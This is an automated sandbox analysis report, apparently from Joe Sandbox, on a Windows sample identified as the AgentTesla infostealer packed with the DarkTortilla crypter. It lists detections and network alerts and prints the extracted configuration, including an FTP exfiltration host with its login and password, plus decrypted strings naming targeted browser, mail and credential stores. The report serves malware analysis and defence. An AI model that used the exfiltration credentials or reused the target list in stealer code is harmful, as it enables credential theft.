Edit tour

Windows Analysis Report
umVoLahqZn.exe

Overview

General Information

Sample name:	umVoLahqZn.exe renamed because original name is a hash value
Original sample name:	325f8b7cb5f2bd3c93b6052bc44407c878feef638ed6303b9385185b05ac3f67.exe
Analysis ID:	1569279
MD5:	6142aad778dc57ae2ecfe036c2d11c4e
SHA1:	73d3b45ab4812f445b6cf1c58ea7b7fdf47295a8
SHA256:	325f8b7cb5f2bd3c93b6052bc44407c878feef638ed6303b9385185b05ac3f67
Tags:	exeuser-adrian__luca
Infos:

Detection

AgentTesla, DarkTortilla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AgentTesla

Yara detected AntiVM3

Yara detected DarkTortilla Crypter

.NET source code contains method to dynamically call methods (often used by packers)

AI detected suspicious sample

Allocates memory in foreign processes

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to launch a process as a different user

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses FTP

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

umVoLahqZn.exe (PID: 5812 cmdline: "C:\Users\user\Desktop\umVoLahqZn.exe" MD5: 6142AAD778DC57AE2ECFE036C2D11C4E)

InstallUtil.exe (PID: 2968 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name	Description	Attribution	Blogpost URLs	Link
DarkTortilla	DarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.	No Attribution	https://www.secureworks.com/research/darktortilla-malware-analysis	https://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://ftp.aminhacorretora.com.br", "Username": "logsftp@aminhacorretora.com.br", "Password": "_yA=,M5*J?KH"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.2724787687.00000000043E9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
00000000.00000002.2724787687.00000000043E9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000000.00000002.2724787687.000000000455E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000004.00000002.3309819183.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000000.00000002.2724787687.000000000462F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
00000000.00000002.2724787687.000000000462F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000000.00000002.2726127716.0000000005A70000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
00000004.00000002.3312331855.0000000003381000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.3312331855.0000000003381000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.2713909861.00000000033E1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
Process Memory Space: umVoLahqZn.exe PID: 5812	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
Process Memory Space: umVoLahqZn.exe PID: 5812	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: InstallUtil.exe PID: 2968	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: InstallUtil.exe PID: 2968	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
decrypted.memstr	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
decrypted.memstr	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.umVoLahqZn.exe.4588612.1.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.umVoLahqZn.exe.45b20f2.3.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.umVoLahqZn.exe.4659420.5.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.umVoLahqZn.exe.4588612.1.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.umVoLahqZn.exe.462f142.2.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
4.2.InstallUtil.exe.400000.0.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.umVoLahqZn.exe.45dbbc2.4.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.umVoLahqZn.exe.45dbbc2.4.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.umVoLahqZn.exe.45b20f2.3.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.umVoLahqZn.exe.4695470.0.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.umVoLahqZn.exe.4695470.0.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.umVoLahqZn.exe.5a70000.6.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.umVoLahqZn.exe.5a70000.6.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.umVoLahqZn.exe.4659420.5.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.umVoLahqZn.exe.4659420.5.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.umVoLahqZn.exe.462f142.2.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.umVoLahqZn.exe.462f142.2.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
Click to see the 12 entries

Suricata Signatures

ET MALWARE AgentTesla Exfil via FTP

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-05T17:19:03.339168+0100	2029927	1	A Network Trojan was detected	192.168.2.5	49823	162.241.203.30	21	TCP

ETPRO MALWARE Agent Tesla CnC Exfil Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-05T17:19:04.266946+0100	2855542	1	A Network Trojan was detected	192.168.2.5	49830	162.241.203.30	49139	TCP
2024-12-05T17:19:04.387388+0100	2855542	1	A Network Trojan was detected	192.168.2.5	49830	162.241.203.30	49139	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: umVoLahqZn.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://ftp.aminhacorretora.com.br	Avira URL Cloud: Label: malware
Source: http://aminhacorretora.com.br	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.aminhacorretora.com.br", "Username": "logsftp@aminhacorretora.com.br", "Password": "_yA=,M5*J?KH"}

Multi AV Scanner detection for submitted file

Source: umVoLahqZn.exe

ReversingLabs: Detection: 71%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: umVoLahqZn.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: /log.tmp
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: yyyy_MM_dd_HH_mm_ss
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: .html
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: <html>
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: </html>
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: yyyy_MM_dd_HH_mm_ss
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: .html
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: <html>
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: </html>
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: <br>[
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: yyyy-MM-dd HH:mm:ss
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: ]<br>
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: <br>
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: yyyy_MM_dd_HH_mm_ss
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: .html
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: yyyy_MM_dd_HH_mm_ss
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: .zip
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Time:
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: MM/dd/yyyy HH:mm:ss
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: <br>User Name:
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: <br>Computer Name:
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: <br>OSFullName:
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: <br>CPU:
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: <br>RAM:
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: <br>
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: IP Address:
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: <br>
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: <hr>
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: New
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: MM/dd/yyyy HH:mm:ss
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: IP Address:
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: false
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: false
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: false
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: false
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: false
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: true
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: false
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: ftp://ftp.aminhacorretora.com.br
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: logsftp@aminhacorretora.com.br
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: _yA=,M5*J?KH
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: false
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: false
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: appdata
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: XVWmeW
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: XVWmeW.exe
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: XVWmeW
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Type
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: <br>
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: <hr>
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: <br>
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: <b>[
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: ]</b> (
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: )<br>
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: {BACK}
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: {ALT+TAB}
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: {ALT+F4}
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: {TAB}
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: {ESC}
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: {Win}
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: {CAPSLOCK}
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: {KEYUP}
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: {KEYDOWN}
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: {KEYLEFT}
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: {KEYRIGHT}
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: {DEL}
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: {END}
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: {HOME}
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: {Insert}
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: {NumLock}
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: {PageDown}
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: {PageUp}
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: {ENTER}
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: {F1}
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: {F2}
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: {F3}
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: {F4}
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: {F5}
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: {F6}
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: {F7}
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: {F8}
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: {F9}
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: {F10}
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: {F11}
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: {F12}
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: control
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: {CTRL}
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: &
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: <
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: >
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: "
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: <br><hr>Copied Text: <br>
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: <hr>
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: logins
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: IE/Edge
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Windows Secure Note
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: 3CCD5499-87A8-4B10-A215-608888DD3B55
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Windows Web Password Credential
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: 154E23D0-C644-4E6F-8CE6-5069272F999F
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Windows Credential Picker Protector
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Web Credentials
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Windows Credentials
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Windows Domain Certificate Credential
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: 3E0E35BE-1B77-43E7-B873-AED901B6275B
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Windows Domain Password Credential
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Windows Extended Credential
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: 00000000-0000-0000-0000-000000000000
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: SchemaId
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: pResourceElement
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: pIdentityElement
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: pPackageSid
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: pAuthenticatorElement
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: IE/Edge
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: UC Browser
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: UCBrowser\
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Login Data
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: journal
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: wow_logins
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Safari for Windows
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \Common Files\Apple\Apple Application Support\plutil.exe
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \Apple Computer\Preferences\keychain.plist
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: <array>
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: <dict>
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: <string>
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: </string>
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: <string>
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: </string>
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: <data>
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: </data>
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: -convert xml1 -s -o "
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \fixed_keychain.xml"
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \Microsoft\Credentials\
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \Microsoft\Credentials\
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \Microsoft\Credentials\
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \Microsoft\Credentials\
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \Microsoft\Protect\
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: credential
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: QQ Browser
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Tencent\QQBrowser\User Data
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \Default\EncryptedStorage
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Profile
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \EncryptedStorage
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: entries
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: category
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Password
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: str3
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: str2
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: blob0
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: password_value
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: IncrediMail
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: PopPassword
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: SmtpPassword
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Software\IncrediMail\Identities\
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \Accounts_New
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: PopPassword
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: SmtpPassword
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: SmtpServer
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: EmailAddress
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Eudora
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Software\Qualcomm\Eudora\CommandLine\
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: current
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Settings
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: SavePasswordText
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Settings
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: ReturnAddress
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Falkon Browser
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \falkon\profiles\
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: profiles.ini
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: startProfile=([A-z0-9\/\.\"]+)
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: profiles.ini
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \browsedata.db
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: autofill
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: ClawsMail
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \Claws-mail
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \clawsrc
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \clawsrc
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: passkey0
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: master_passphrase_salt=(.+)
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: master_passphrase_pbkdf2_rounds=(.+)
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \accountrc
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: smtp_server
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: address
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: account
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \passwordstorerc
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: {(.),(.)}(.*)
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Flock Browser
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: APPDATA
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: \Flock\Browser\
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: signons3.txt
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: DynDns
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: ALLUSERSPROFILE
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: Dyn\Updater\config.dyndns
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: username=
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: password=
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: https://account.dyn.com/
Source: 0.2.umVoLahqZn.exe.4659420.5.raw.unpack	String decryptor: t6KzXhCh
